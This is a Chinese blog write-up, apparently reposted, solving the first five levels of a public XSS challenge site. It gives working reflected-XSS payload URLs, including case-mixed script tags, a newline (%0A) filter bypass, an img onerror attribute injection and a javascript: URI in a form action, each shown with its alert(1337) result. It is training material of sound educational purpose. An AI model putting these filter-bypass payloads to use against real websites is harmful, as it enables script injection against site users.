首页 > 其他 > 详细

XSS Challenges

时间:2019-02-16 15:35:27      阅读:329      评论:0      收藏:0      [点我收藏+]

 

平台:

http://www.zixem.altervista.org/XSS/

技术分享图片

 

level1:

Payload:

http://www.zixem.altervista.org/XSS/1.php?name=zxm<script>alert(1337);</script>

技术分享图片

 

Level2

屏蔽了script字符,可以使用大写和大小写混淆绕过

Payloads:

http://www.zixem.altervista.org/XSS/2.php?name=zxm<SCRIPT>alert(1337);</SCRIPT>

http://www.zixem.altervista.org/XSS/2.php?name=zxm<ScRiPT>alert("1337");</ScRiPT>

技术分享图片

 

Level3

http://www.zixem.altervista.org/XSS/3.php?name=zxm</script></script>alert("1337");</script>

返回:

Hello, zxmalert("1337");

屏蔽了<script>字符。使用特殊字符绕过,一览表:

技术分享图片

技术分享图片

payload

http://www.zixem.altervista.org/XSS/3.php?name=zxm%0A<script>alert("1337");</script>

 换行符没有过滤,因此使用%0A 进行绕过

 技术分享图片

 

Level4

http://www.zixem.altervista.org/XSS/4.php?img=htp.png

payload:

http://www.zixem.altervista.org/XSS/4.php?img=htp.png <script>alert(1337);</script>

返回结果:

<hr />level 4<p /><img src=‘htp.png &lt;script&gt;alert(1337);&lt;/script&gt;‘ />

It looks like < > 符号已经被转义

payloads:

http://www.zixem.altervista.org/XSS/4.php?img=htp‘ onerror=‘alert(1337)

http://www.zixem.altervista.org/XSS/4.php?img=saintfox‘ onerror=‘alert(1337)

技术分享图片

 

Level5

http://www.zixem.altervista.org/XSS/5.php?name=zxm&action=5.php

提交返回:

Hello, &lt;script&gt;alert(1337)&lt;/script&gt;!

http://www.zixem.altervista.org/XSS/5.php?name=zxm&action=javascript:alert(1337);

技术分享图片

 

待续。。。。

XSS Challenges

原文:https://www.cnblogs.com/hack404/p/10387854.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!